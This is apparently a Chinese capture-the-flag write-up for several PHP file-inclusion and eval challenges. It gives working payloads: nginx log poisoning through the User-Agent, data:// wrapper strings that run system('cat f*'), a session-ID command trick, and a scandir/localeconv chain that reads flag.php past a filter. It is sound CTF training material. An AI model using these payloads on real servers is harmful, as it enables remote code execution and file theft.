因为是倒着做的,导致一些payload可以通杀,不利于萌新学习。希望各位给出一些其他的方法。
37
同39
38
日志包含可过,在UA中写入一句话,然后直接包含日志文件/var/log/nginx/access.log
data伪协议可过,payload:data:text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
按照出题人的想法肯定是让我们包含flag.php然后就会直接输出flag
39
限制了后缀,我们可以试试伪协议,因为不能带有flag,所以filter协议和php://input也不好用了。
最后试了试data协议,发现成功了。
payload c=data:text/plain,<?php system('cat f*')?>
这样就相当于执行了php语句<?php system('cat f*')?>.php
因为前面的php语句已经闭合了,所以后面的.php会被当成html页面直接显示在页面上,起不到什么作用。
40
具体做法可以参考下GXYCTF的禁止套娃
仔细看下题会发现过滤的不是英文括号,而是中文括号。
所以基本的命令都可以用,但是很难受的是引号没了,美元符号没了。
1、利用session
一开始我想的是利用session_id(),首先修改下cookie中的PHPSESSID 内容为ls
然后输入 c=session_start();system(session_id());发现可以执行。
接着直接改成 c=session_start();highlight_file(session_id());然后PHPSESSID的值修改为flag.php就出问题了。
经过测试发现,受php版本影响 5.5 -7.1.9均可以执行,因为session_id规定为0-9,a-z,A-Z,-中的字符。在5.5以下及7.1以上均无法写入除此之外的内容。但是符合要求的字符还是可以的。
因此可以另寻他法了,如果有师傅用sessionid做出来,希望评论下面指正我上面的说法。
2、读文件+数组改造
先把payload写下 highlight_file(next(array_reverse(scandir(pos(localeconv())))));
需要用到的函数
localeconv():返回一包含本地数字及货币格式信息的数组。其中数组中的第一个为点号(.)
pos():返回数组中的当前元素的值。
array_reverse():数组逆序
scandir():获取目录下的文件
next(): 函数将内部指针指向数组中的下一个元素,并输出。
首先通过 pos(localeconv())得到点号,因为scandir(’.’)表示得到当前目录下的文件,所以
scandir(pos(localeconv()))就能得到flag.php了。具体内容如下
我们的目的很明确,得到倒数第二个元素。直接将数组逆序在将指针调整到下一个就好了。
扫一扫
2886
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
